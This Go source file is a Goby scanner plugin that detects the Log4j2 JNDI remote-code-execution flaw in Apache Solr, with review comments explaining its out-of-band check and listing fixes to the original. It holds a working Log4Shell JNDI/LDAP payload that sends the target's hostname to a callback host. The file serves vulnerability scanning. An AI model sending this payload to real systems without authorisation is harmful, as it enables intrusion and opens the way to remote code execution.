package exploits
import (
// Import the packages this check needs. NOTE(review): "fmt" and "strings" are
// not referenced anywhere in this file; Go rejects unused imports, so the file
// does not build until they are removed (or used).
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/godclient"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
"time"
)
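// init registers the "Apache Solr Log4j2 Jndi RCE" check with Goby's exploit
// manager. The JSON blob carries the check's metadata plus the generic
// scan/exploit steps; the PoC closure passed to NewExploit performs the
// actual detection.
//
// The detection is blind and out-of-band: a single GET carrying a JNDI lookup
// string is sent to /solr/admin/collections, and the check reports vulnerable
// only if Goby's callback server sees this probe's token within the wait
// window. A target whose outbound DNS/LDAP egress is blocked will therefore
// be reported as not vulnerable even if it is (false negative, never a
// false positive from this path).
//
// NOTE(review): "HasExp" is true in the metadata, but the EXP callback passed
// to NewExploit is nil, so there is no exploit step behind the flag.
//
// Fixes relative to the original: the JSON had a trailing comma in
// "ExploitSteps" and a missing opening quote on "GobyVersion" (both make the
// blob unparseable); the payload scheme was "ldap//" (no ':' → no URL
// scheme, so the lookup could never reach the callback host); the second
// return value of GetGodCheckURL was bound but never used (a Go compile
// error); and the callback package was misspelled "godclent".
func init() {
	expJson := `{
    "Name": "Apache Solr Log4j2 Jndi RCE",
    "Level": "3",
    "Tags": [
        "rce"
    ],
    "GobyQuery": "app=\"Solr\"",
    "Description": "Apache Log4j2被曝存在JNDI远程代码执行漏洞",
    "Product": "",
    "Homepage": "https://gobies.org/",
    "Author": "gobysec@gmail.com",
    "Impact": "",
    "Recommendation": "",
    "References": [
        "https://gobies.org/"
    ],
    "HasExp": true,
    "ExpParams": null,
    "ExpTips": {
        "Type": "",
        "Content": ""
    },
    "ScanSteps": [
        "AND",
        {
            "Request": {
                "method": "GET",
                "uri": "/solr/admin/collections?action=",
                "follow_redirect": true,
                "header": {
                    "User-Agent": "Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
                },
                "data_type": "text",
                "data": "",
                "set_variable": []
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    },
                    {
                        "type": "item",
                        "variable": "$body",
                        "operation": "contains",
                        "value": "true",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": [
                "output|lastbody|regex|"
            ]
        }
    ],
    "ExploitSteps": [
        "AND"
    ],
    "PostTime": "2022-05-24 22:33:22",
    "GobyVersion": "1.9.325"
}`

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		// PoC: returns true only when the out-of-band callback for this
		// probe's token is observed; the HTTP reply itself is not inspected.
		func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
			// Per-probe token. It is embedded in the callback hostname so
			// PullExists can attribute a callback to this request and not
			// to another concurrent scan.
			checkStr := goutils.RandomHexString(4)

			// Callback host for this token. The second return value (whether
			// the callback endpoint is a domain) is not needed here; it was
			// previously bound to an unused variable, which Go rejects.
			checkUrl, _ := godclient.GetGodCheckURL(checkStr)

			// JNDI lookup string, URL-encoded for the query string
			// (%7B/%7D are '{'/'}'). The nested ${hostName} lookup is meant
			// to be expanded by Log4j before the LDAP URL is resolved, so the
			// target's hostname is expected to appear as a subdomain label
			// in the callback. Scheme corrected from "ldap//" to "ldap://".
			uri := "/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D." + checkUrl + "/a%7D"

			cfg := httpclient.NewGetRequestConfig(uri)
			// Do not fail on untrusted/self-signed target certificates.
			cfg.VerifyTls = false
			// The reply is irrelevant to the verdict; do not chase redirects.
			cfg.FollowRedirect = false
			// A body-less GET does not need a media type, but send the
			// well-formed value (original misspelled it "x-www.form-urlencoded").
			cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")

			// Result deliberately ignored: evidence arrives via the callback
			// server, not in this response. A transport error here simply
			// means no callback will be seen and the check returns false.
			httpclient.DoHttpRequest(u, cfg)

			// Wait up to 15s for the token to appear on the callback server.
			return godclient.PullExists(checkStr, time.Second*15)
		},
		// No EXP function: this check only detects, it does not exploit.
		nil,
	))
}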